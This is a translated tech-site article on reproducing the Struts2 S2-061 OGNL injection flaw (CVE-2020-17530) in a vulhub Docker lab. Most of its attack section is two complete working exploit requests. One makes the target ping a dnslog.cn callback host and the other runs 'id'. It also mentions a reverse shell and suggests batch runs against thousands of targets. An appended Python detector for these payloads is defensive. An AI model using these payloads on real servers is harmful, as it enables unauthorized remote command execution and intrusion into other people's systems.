Updated 2025-01-19. From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com), 05/31 report
How do you reproduce the Struts2 S2-061 remote command execution vulnerability (CVE-2020-17530)? Many inexperienced readers are unsure how to approach it, so this article summarizes the cause of the problem and the steps to reproduce and fix it. I hope it helps you.
Reproducing the Struts2 S2-061 remote command execution vulnerability
I. Vulnerability overview
Apache Struts 2 is a web framework for developing Java EE web applications. On December 8, 2020, Apache Struts disclosed the S2-061 remote code execution vulnerability (CVE-2020-17530): when certain tags are used, OGNL expression injection is possible, which leads to remote code execution and carries a high risk.
II. Affected versions
Apache Struts 2.0.0 - 2.5.25
III. Reproducing the vulnerability
Docker environment address:
Project address: https://github.com/vulhub/vulhub/tree/master/struts2/s2-061
Pull the image and start the environment:
docker-compose up -d
Access the target address:
http://192.168.1.107:8080/
Verify the vulnerability with a DNSlog request:
POST /index.action HTTP/1.1
Host: 192.168.1.107:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 846

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

% {(# instancemanager=#application ["org.apache.tomcat.InstanceManager"]). (# stack=#attr ["com.opensymphony.xwork2.util.ValueStack.ValueStack"]). (# bean=#instancemanager.newInstance ("org.apache.commons.collections.BeanMap")). (# bean.setBean (# stack)). (# context=#bean.get ("context")). (# bean.setBean (# context)). (# macc=#bean.get ("memberAccess")) Bean.setBean (# macc). (# emptyset=#instancemanager.newInstance ("java.util.HashSet")). (# bean.put ("excludedClasses") # emptyset)). (# bean.put ("excludedPackageNames", # emptyset)). (# arglist=#instancemanager.newInstance ("java.util.ArrayList")). (# arglist.add ("ping p0fai2.dnslog.cn")). (# execute=#instancemanager.newInstance ("freemarker.template.utility.Execute")). (# execute.exec (# arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
DNSlog record
Capture the request, send the exploit payload and execute the id command:
POST /index.action HTTP/1.1
Host: 192.168.1.107:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 827

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

% {(# instancemanager=#application ["org.apache.tomcat.InstanceManager"]). (# stack=#attr ["com.opensymphony.xwork2.util.ValueStack.ValueStack"]). (# bean=#instancemanager.newInstance ("org.apache.commons.collections.BeanMap")). (# bean.setBean (# stack)). (# context=#bean.get ("context")). (# bean.setBean (# context)). (# macc=#bean.get ("memberAccess")) Bean.setBean (# macc). (# emptyset=#instancemanager.newInstance ("java.util.HashSet")). (# bean.put ("excludedClasses") # emptyset)). (# bean.put ("excludedPackageNames", # emptyset)). (# arglist=#instancemanager.newInstance ("java.util.ArrayList")). (# arglist.add ("id")). (# execute=#instancemanager.newInstance ("freemarker.template.utility.Execute")). (# execute.exec (# arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
Verification with a simple Python script:
A reverse shell can also be obtained successfully:
Running it in batches against thousands of targets (the default index path may be wrong) is left for later study.
IV. Security recommendations
Upgrade the Apache Struts framework to the latest version.
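As an added defensive example (not code from the original article or from vulhub), the following Python flags multipart form fields whose value is a forced OGNL expression that also names the classes used by the S2-061 payload shown above, so such requests can be picked out of WAF or access-log captures; the boundary, field name and sample bodies are constructed.

```python
import re
from urllib.parse import unquote_plus

# Class/property names from the published S2-061 payload; none belongs in a form value.
S2_061_INDICATORS = (
    "org.apache.tomcat.InstanceManager",
    "com.opensymphony.xwork2.util.ValueStack",
    "org.apache.commons.collections.BeanMap",
    "memberAccess", "excludedClasses", "excludedPackageNames",
    "freemarker.template.utility.Execute",
)
OGNL_EXPR = re.compile(r"[%$]\{.+?\}", re.DOTALL)  # forced OGNL markers %{...} / ${...}

def multipart_fields(body: str, boundary: str) -> dict:
    """Split a multipart/form-data body into {field_name: raw_value}."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip()
        if not part or part == "--":  # leading empty piece / closing "--"
            continue
        head, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]*)"', head)
        if m:
            fields[m.group(1)] = value
    return fields

def inspect_value(value: str) -> dict:
    """Flag a value that is an OGNL expression and names S2-061 sink classes."""
    decoded = unquote_plus(value)  # also catches percent-encoded variants
    has_expr = bool(OGNL_EXPR.search(decoded))
    hits = [ind for ind in S2_061_INDICATORS if ind in decoded]
    return {"ognl_expression": has_expr, "indicators": hits,
            "suspicious": has_expr and bool(hits)}

def flagged_fields(body: str, boundary: str) -> list:
    """Names of multipart fields whose value looks like an S2-061 probe."""
    return [name for name, val in multipart_fields(body, boundary).items()
            if inspect_value(val)["suspicious"]]

# Constructed sample bodies (not real captures); the OGNL text is an inert
# fragment that merely references one indicator class name.
BOUNDARY = "----WebKitFormBoundaryTEST"
def _body(value):
    return ("--" + BOUNDARY + '\r\nContent-Disposition: form-data; name="id"\r\n\r\n'
            + value + "\r\n--" + BOUNDARY + "--\r\n")
BENIGN = _body("42")
PLAIN = _body('%{(#a=#application["org.apache.tomcat.InstanceManager"])}')
ENCODED = _body("%25%7B(%23a%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D)%7D")
```

Run flagged_fields(PLAIN, BOUNDARY) to see the "id" field reported; a plain OGNL arithmetic expression without the sink class names is deliberately not flagged, so tune S2_061_INDICATORS to your own environment.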
After reading the above, do you know how to reproduce the Struts2 S2-061 remote command execution vulnerability (CVE-2020-17530)? If you want to learn more skills or know more about the topic, you are welcome to follow the industry information channel. Thank you for reading!